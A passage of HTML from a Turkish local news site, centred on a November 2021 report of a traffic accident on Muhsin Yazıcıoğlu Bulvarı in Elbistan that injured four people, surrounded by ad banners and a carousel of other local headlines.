<a href="https://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" />
KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" />
Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" />
Öğrenciler hedefi 12’den vurmak için yarıştı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" />
Piazza’da indirim yarışı</a>
</div>
</div></div> </div>
  </div>
  
</div>
          </div>
    
    <div id="mainContainer" class="container center  shadow" style="padding-top:20px;">

            <div class="page-header-fixed style hide">
        <div class="container center">
        <div class="title"></div>
        <div class="pull-right">          <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span>          <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a>
          <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
        </div>
        </div>
      </div>
      
      
      
      
<div class="reklam-fluid reklam reklam106"><a href="https://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/ahsen-mobilya_1.gif" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" class="img-responsive"/></a></div>
<div id="ustmanset" class="fluid ustmanset  ustmanset5">
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/eski-tedas-binasi-millet-konagi-oluyor-h71877.html" title="Eski TEDAŞ binası ‘Millet Konağı’ oluyor" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2021/11/eski-tedaş-binası-2.jpg" alt="Eski TEDAŞ binası ‘Millet Konağı’ oluyor" />
      <div class="caption">Eski TEDAŞ binası ‘Millet Konağı’...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-uzakdogu-sporlarina-ozel-destek-h71876.html" title="Elbistan Belediyesi’nden Uzakdoğu sporlarına özel destek" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2021/11/uzakdoğu-sporları-destek-2.jpg" alt="Elbistan Belediyesi’nden Uzakdoğu sporlarına özel destek" />
      <div class="caption"></div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/bos-kalan-kadrolara-yeniden-atama-yapilacak-h71872.html" title="Boş kalan kadrolara yeniden atama yapılacak" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2021/11/hastadoktor.jpeg" alt="Boş kalan kadrolara yeniden atama yapılacak" />
      <div class="caption">Boş kalan kadrolara yeniden atama...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/ciftci-kuraklik-destegi-odemelerini-bekliyor-h71871.html" title="Çiftçi kuraklık desteği ödemelerini bekliyor" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2021/11/İsimsiz-1_1.jpg" alt="Çiftçi kuraklık desteği ödemelerini bekliyor" />
      <div class="caption">Çiftçi kuraklık desteği ödemelerini bekliyor</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/baskan-gungor-elbistanin-100-yillik-sorununu-cozuyoruz-h71865.html" title="Başkan Güngör: “Elbistan’ın 100 yıllık sorununu çözüyoruz”" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2021/11/başkan-gungor-elbistan-programı-1.jpg" alt="Başkan Güngör: “Elbistan’ın 100 yıllık sorununu çözüyoruz”" />
      <div class="caption">Başkan Güngör: “Elbistan’ın 100 yıllık...</div>    </a>
  </div>
  </div>
<!-- Üst Manşet -->

<div class="reklam-fluid reklam reklam109"><a href="https://www.elbistaninsesi.com/banner.php?id=191" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/KENTPARK-KASIM-SON_1.gif" width="980" height="202" style="width:980px;height: 202px;border:0" alt="banner191" class="img-responsive"/></a></div>

      
      <!-- MAIN -->

      
      
      
      
      <div class="row">

        
        <!-- Sol Blok -->
        <div id="main" class="span8">
          <div class="reklam reklam129"><a href="https://www.elbistaninsesi.com/banner.php?id=162" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/balıkcı.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner162" class="img-responsive"/></a></div>
<article id="haber">

    
    
          <div class="page-header clearfix">
        <h1 class="title gs-title" itemprop="name">Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı</h1>
                <h2 class="lead" itemprop="description"><strong>Elbistan’da, Muhsin Yazıcıoğlu Bulvarı’nda yaşanan trafik kazasında 4 kişi yaralandı.</strong></h2>
      </div>
    
            <div class="clearfix muted">
        <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2021-11-14 17:31:32" content="2021-11-14T17:31:32+02:00">14 Kasım 2021 Pazar 17:31</span></p>
              </div>
      
              <div class="clearfix newspic">
      <span>
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/muhsin_yazicioglu_bulvarinda_kaza_4_yarali_h71884_869de.jpg" alt="Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı" itemprop="image"/>
      </span>
    </div>
    <div class="clearfix page-social">
        <div class="shr">
        <div id="paylas" class="hs-paylas paylas-haber-71884"></div>        </div>
        <div class="karakterislem secilemez pull-right">
          <i class="glyphicons-icon text_smaller"></i>
          <i class="glyphicons-icon text_bigger"></i>
          <i class="glyphicons-icon font"></i>
          <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
        </div>
    </div>
      

  <div id="newstext" class="clearfix page-content">
    
                <div class="reklam reklam134 text-center"><a href="https://www.elbistaninsesi.com/banner.php?id=167" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/hunkar.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner167" class="img-responsive"/></a></div>        <div itemprop="articleBody" id="newsbody"><p><span style="font-size:16px;"><span style="font-family:Arial">Elbistan’da, Muhsin Yazıcıoğlu Bulvarı’nda yaşanan trafik kazasında 4 kişi yaralandı. </span></span></p>

<p><span style="font-size:16px;"><span style="font-family:Arial">Edinilen bilgiye göre, Mahmut K. yönetimindeki 46 EZ 582 plakalı otomobile, Halil K.’nın kullandığı 33 VJC 23 plakalı araç yandan çarptı. Kazada, her iki araç da karşı şeride geçti. Mahmut K.’nın direksiyonunda bulunduğu otomobil ise çarpmanın etkisi ile kaldırıma çıktı. Olayda, sürücülerle birlikte Halil K.’nın kullandığı araçta bulunan Cennet Ç. ve Elif T.adlı yolcular yaralandı. Kaza ihbarının ardından olay yerine ambulans, polis ve itfaiye ekipleri sevk edildi. Yaralılar, ilk müdahaleleri olay yerinde yapıldıktan sonra 112 Acil Servis ekiplerince Elbistan Devlet Hastanesi’ne kaldırıldı. Yaralıların sağlık durumlarının iyi olduğu öğrenildi.</span></span></p>

<p><span style="font-size:16px;"><span style="font-family:Arial">Kazayla ilgili tahkikat başlatıldı.</span></span></p><div class="p_ad"></div>

<p><span style="font-size:16px;"><span style="font-family:Arial"><img alt="" src="https://www.elbistaninsesi.com/images/upload/cd4dcd9d-983d-4b6e-b489-5a4308b41535.jpg" style="width: 768px; height: 355px;" /></span></span></p>

<p><span style="font-size:16px;"><span style="font-family:Arial"><img alt="" src="https://www.elbistaninsesi.com/images/upload/910ea1ef-f136-4899-a26a-81a72189ad43.jpg" style="width: 800px; height: 370px;" /></span></span></p>

<p><span style="font-size:16px;"><span style="font-family:Arial"><img alt="" src="https://www.elbistaninsesi.com/images/upload/ac447b80-d2e1-43a3-a54e-46daa0f98519.jpg" style="width: 768px; height: 355px;" /></span></span></p>

<p><span style="font-size:16px;"><span style="font-family:Arial"><img alt="" src="https://www.elbistaninsesi.com/images/upload/5f146615-ead2-48b2-9bd9-4dd51b0bd649.jpg" style="width: 768px; height: 355px;" /></span></span></p></p></div>
                    
  
  </div>
  </article>

    <div class="hide-print">
    
<div id="anamanset" class="carousel carousel-nav hs-manset manset-standart modul-haber slid secilemez">

  <ol class="carousel-indicators twentyfive carousel-hover">

        <li class="hs-bgca active" onclick="window.location='https://www.elbistaninsesi.com/guncel/muhsin-yazicioglu-bulvarinda-kaza-4-yarali-h71884.html'; return false;"  data-target="#anamanset" data-slide-to="0">1</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/elbistanspordan-4-gollu-galibiyet-h71883.html'; return false;"  data-target="#anamanset" data-slide-to="1">2</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/eski-tedas-binasi-millet-konagi-oluyor-h71877.html'; return false;"  data-target="#anamanset" data-slide-to="2">3</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-uzakdogu-sporlarina-ozel-destek-h71876.html'; return false;"  data-target="#anamanset" data-slide-to="3">4</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/camilerde-normal-saf-duzenine-geciliyor-h71873.html'; return false;"  data-target="#anamanset" data-slide-to="4">5</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/rabia-taskin-saglikli-beslenme-ve-diyet-danismanligi-merkezi-h71878.html'; return false;"  data-target="#anamanset" data-slide-to="5">6</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/bos-kalan-kadrolara-yeniden-atama-yapilacak-h71872.html'; return false;"  data-target="#anamanset" data-slide-to="6">7</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/ciftci-kuraklik-destegi-odemelerini-bekliyor-h71871.html'; return false;"  data-target="#anamanset" data-slide-to="7">8</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/atilladan-akciger-kanseri-bilgilendirmesi-h71870.html'; return false;"  data-target="#anamanset" data-slide-to="8">9</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/elbistanda-bi-hareketine-bakar-hayat-uygulamasi-yapildi-h71868.html'; return false;"  data-target="#anamanset" data-slide-to="9">10</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/jandarmadan-tarihi-eser-operasyonu-2-h71867.html'; return false;"  data-target="#anamanset" data-slide-to="10">11</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/baskan-gurbuzden-akedasa-tesekkur-ziyareti-h71866.html'; return false;"  data-target="#anamanset" data-slide-to="11">12</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/baskan-gungor-elbistanin-100-yillik-sorununu-cozuyoruz-h71865.html'; return false;"  data-target="#anamanset" data-slide-to="12">13</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/prof-dr-gorur-turkoglu-hatti-riskli-h71864.html'; return false;"  data-target="#anamanset" data-slide-to="13">14</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/oztunctan-elbistanin-il-olmasi-icin-bir-kanun-teklifi-daha-h71863.html'; return false;"  data-target="#anamanset" data-slide-to="14">15</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/elbistanda-okul-isletme-isbirligi-projesi-hayata-geciriliyor-h71862.html'; return false;"  data-target="#anamanset" data-slide-to="15">16</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/kavsakta-kaza-2-yarali-2-h71861.html'; return false;"  data-target="#anamanset" data-slide-to="16">17</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/malatya-daki-deprem-elbistan-da-da-hissedildi-2-h71860.html'; return false;"  data-target="#anamanset" data-slide-to="17">18</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/karahasanlilar-derneginden-tbmm-baskani-sentopa-iade-i-ziyaret-h71858.html'; return false;"  data-target="#anamanset" data-slide-to="18">19</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/toplu-ulasima-zam-2-h71855.html'; return false;"  data-target="#anamanset" data-slide-to="19">20</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/meyve-suyu-kutusunda-uyusturucu-sevkiyati-narkotike-takildi-h71854.html'; return false;"  data-target="#anamanset" data-slide-to="20">21</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/elbistanin-gelecegine-8-bin-fidanlik-nefes-h71853.html'; return false;"  data-target="#anamanset" data-slide-to="21">22</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/ozel-idarenin-yikim-ihalesi-gerceklesti-h71852.html'; return false;"  data-target="#anamanset" data-slide-to="22">23</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/adalet-ormaninda-meyve-ve-ardic-fidanlari-toprakla-bulustu-h71851.html'; return false;"  data-target="#anamanset" data-slide-to="23">24</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/elbistan-ciftcisine-hibe-destekler-anlatilacak-h71850.html'; return false;"  data-target="#anamanset" data-slide-to="24">25</li>
    
      </ol>

  <div class="carousel-inner">

        <div class="item active">
      <a href="https://www.elbistaninsesi.com/guncel/muhsin-yazicioglu-bulvarinda-kaza-4-yarali-h71884.html" title="Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/muhsin_yazicioglu_bulvarinda_kaza_4_yarali_h71884_869de.jpg" alt="Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/elbistanspordan-4-gollu-galibiyet-h71883.html" title="Elbistanspor’dan 4 gollü galibiyet">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/elbistanspordan_4_gollu_galibiyet_h71883_c4c66.jpg" alt="Elbistanspor’dan 4 gollü galibiyet" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistanspor’dan 4 gollü galibiyet</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/eski-tedas-binasi-millet-konagi-oluyor-h71877.html" title="Eski TEDAŞ binası ‘Millet Konağı’ oluyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/eski_tedas_binasi_millet_konagi_oluyor_h71877_2a67c.JPG" alt="Eski TEDAŞ binası ‘Millet Konağı’ oluyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Eski TEDAŞ binası ‘Millet Konağı’ oluyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-uzakdogu-sporlarina-ozel-destek-h71876.html" title="Elbistan Belediyesi’nden Uzakdoğu sporlarına özel destek">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/elbistan_belediyesinden_uzakdogu_sporlarina_ozel_destek_h71876_4f5c5.jpg" alt="Elbistan Belediyesi’nden Uzakdoğu sporlarına özel destek" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan Belediyesi’nden Uzakdoğu sporlarına özel destek</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/camilerde-normal-saf-duzenine-geciliyor-h71873.html" title="Camilerde normal saf düzenine geçiliyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/camilerde_normal_saf_duzenine_geciliyor_h71873_995c1.JPG" alt="Camilerde normal saf düzenine geçiliyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Camilerde normal saf düzenine geçiliyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/rabia-taskin-saglikli-beslenme-ve-diyet-danismanligi-merkezi-h71878.html" title="Rabia Taşkın Sağlıklı Beslenme ve Diyet Danışmanlığı Merkezi açıldı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/rabia_taskin_saglikli_beslenme_ve_diyet_danismanligi_merkezi_acildi_h71878_771e9.jpeg" alt="Rabia Taşkın Sağlıklı Beslenme ve Diyet Danışmanlığı Merkezi açıldı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Rabia Taşkın Sağlıklı Beslenme ve Diyet Danışmanlığı Merkezi açıldı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/bos-kalan-kadrolara-yeniden-atama-yapilacak-h71872.html" title="Boş kalan kadrolara yeniden atama yapılacak">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/bos_kalan_kadrolara_yeniden_atama_yapilacak_h71872_8a4bb.jpeg" alt="Boş kalan kadrolara yeniden atama yapılacak" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Boş kalan kadrolara yeniden atama yapılacak</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/ciftci-kuraklik-destegi-odemelerini-bekliyor-h71871.html" title="Çiftçi kuraklık desteği ödemelerini bekliyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/ciftci_kuraklik_destegi_odemelerini_bekliyor_h71871_762d2.jpg" alt="Çiftçi kuraklık desteği ödemelerini bekliyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Çiftçi kuraklık desteği ödemelerini bekliyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/atilladan-akciger-kanseri-bilgilendirmesi-h71870.html" title="Atilla’dan akciğer kanseri bilgilendirmesi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/atilladan_akciger_kanseri_bilgilendirmesi_h71870_09cf7.jpeg" alt="Atilla’dan akciğer kanseri bilgilendirmesi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Atilla’dan akciğer kanseri bilgilendirmesi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/elbistanda-bi-hareketine-bakar-hayat-uygulamasi-yapildi-h71868.html" title="Elbistan’da &#039;Bi Hareketine Bakar Hayat&#039; uygulaması yapıldı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/elbistanda-bi-hareketine-bakar-hayat-uygulamasi-yapildi_e0d7a.jpg" alt="Elbistan’da &#039;Bi Hareketine Bakar Hayat&#039; uygulaması yapıldı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan’da &#039;Bi Hareketine Bakar Hayat&#039; uygulaması yapıldı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/jandarmadan-tarihi-eser-operasyonu-2-h71867.html" title="Jandarmadan tarihi eser operasyonu">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/jandarmadan_tarihi_eser_operasyonu_h71867_efea9.jpg" alt="Jandarmadan tarihi eser operasyonu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Jandarmadan tarihi eser operasyonu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/baskan-gurbuzden-akedasa-tesekkur-ziyareti-h71866.html" title="Başkan Gürbüz’den Akedaş‘a teşekkür ziyareti">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/baskan_gurbuzden_akedasa_tesekkur_ziyareti_h71866_b5759.jpg" alt="Başkan Gürbüz’den Akedaş‘a teşekkür ziyareti" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Gürbüz’den Akedaş‘a teşekkür ziyareti</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/baskan-gungor-elbistanin-100-yillik-sorununu-cozuyoruz-h71865.html" title="Başkan Güngör: “Elbistan’ın 100 yıllık sorununu çözüyoruz”">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/baskan_gungor_elbistanin_100_yillik_sorununu_cozuyoruz_h71865_1fd67.JPG" alt="Başkan Güngör: “Elbistan’ın 100 yıllık sorununu çözüyoruz”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Güngör: “Elbistan’ın 100 yıllık sorununu çözüyoruz”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/prof-dr-gorur-turkoglu-hatti-riskli-h71864.html" title="Prof. Dr. Görür: “Türkoğlu hattı riskli”">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/prof_dr_gorur_turkoglu_hatti_riskli_h71864_6dc31.jpg" alt="Prof. Dr. Görür: “Türkoğlu hattı riskli”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Prof. Dr. Görür: “Türkoğlu hattı riskli”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/oztunctan-elbistanin-il-olmasi-icin-bir-kanun-teklifi-daha-h71863.html" title="Öztunç’tan Elbistan’ın il olması için bir kanun teklifi daha">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/oztunctan_elbistanin_il_olmasi_icin_bir_kanun_teklifi_daha_h71863_ba297.JPG" alt="Öztunç’tan Elbistan’ın il olması için bir kanun teklifi daha" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Öztunç’tan Elbistan’ın il olması için bir kanun teklifi daha</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/elbistanda-okul-isletme-isbirligi-projesi-hayata-geciriliyor-h71862.html" title="Elbistan’da ‘Okul-İşletme İşbirliği’ projesi hayata geçiriliyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/elbistanda_okul_isletme_isbirligi_projesi_hayata_geciriliyor_h71862_4c53b.jpg" alt="Elbistan’da ‘Okul-İşletme İşbirliği’ projesi hayata geçiriliyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan’da ‘Okul-İşletme İşbirliği’ projesi hayata geçiriliyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/kavsakta-kaza-2-yarali-2-h71861.html" title="Kavşakta kaza: 2 yaralı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/kavsakta_kaza_2_yarali_h71861_7b09f.JPG" alt="Kavşakta kaza: 2 yaralı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kavşakta kaza: 2 yaralı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/malatya-daki-deprem-elbistan-da-da-hissedildi-2-h71860.html" title="Malatya&#039;daki deprem, Elbistan&#039;da da hissedildi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/malatya_daki_deprem_elbistan_da_da_hissedildi_h71860_09902.jpg" alt="Malatya&#039;daki deprem, Elbistan&#039;da da hissedildi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Malatya&#039;daki deprem, Elbistan&#039;da da hissedildi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/karahasanlilar-derneginden-tbmm-baskani-sentopa-iade-i-ziyaret-h71858.html" title="Karahasanlılar Derneği’nden TBMM Başkanı Şentop’a iade-i ziyaret">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/karahasanlilar_derneginden_tbmm_baskani_sentopa_iade_i_ziyaret_h71858_9a16c.jpg" alt="Karahasanlılar Derneği’nden TBMM Başkanı Şentop’a iade-i ziyaret" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Karahasanlılar Derneği’nden TBMM Başkanı Şentop’a iade-i ziyaret</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/toplu-ulasima-zam-2-h71855.html" title="Toplu ulaşıma zam!">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/toplu_ulasima_zam_h71855_0ad34.jpg" alt="Toplu ulaşıma zam!" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Toplu ulaşıma zam!</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/meyve-suyu-kutusunda-uyusturucu-sevkiyati-narkotike-takildi-h71854.html" title="Meyve suyu kutusunda uyuşturucu sevkiyatı Narkotik’e takıldı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/meyve_suyu_kutusunda_uyusturucu_sevkiyati_narkotike_takildi_h71854_48d67.jpg" alt="Meyve suyu kutusunda uyuşturucu sevkiyatı Narkotik’e takıldı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Meyve suyu kutusunda uyuşturucu sevkiyatı Narkotik’e takıldı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/elbistanin-gelecegine-8-bin-fidanlik-nefes-h71853.html" title="Elbistan’ın geleceğine 8 bin fidanlık nefes">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/elbistanin_gelecegine_8_bin_fidanlik_nefes_h71853_5548d.JPG" alt="Elbistan’ın geleceğine 8 bin fidanlık nefes" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan’ın geleceğine 8 bin fidanlık nefes</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/ozel-idarenin-yikim-ihalesi-gerceklesti-h71852.html" title="Özel İdare’nin Yıkım İhalesi Gerçekleşti">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/ozel_idarenin_yikim_ihalesi_gerceklesti_h71852_dc412.jpg" alt="Özel İdare’nin Yıkım İhalesi Gerçekleşti" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Özel İdare’nin Yıkım İhalesi Gerçekleşti</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/adalet-ormaninda-meyve-ve-ardic-fidanlari-toprakla-bulustu-h71851.html" title="Adalet Ormanı’nda meyve ve ardıç fidanları toprakla buluştu">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/adalet_ormaninda_meyve_ve_ardic_fidanlari_toprakla_bulustu_h71851_2db4f.JPG" alt="Adalet Ormanı’nda meyve ve ardıç fidanları toprakla buluştu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Adalet Ormanı’nda meyve ve ardıç fidanları toprakla buluştu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
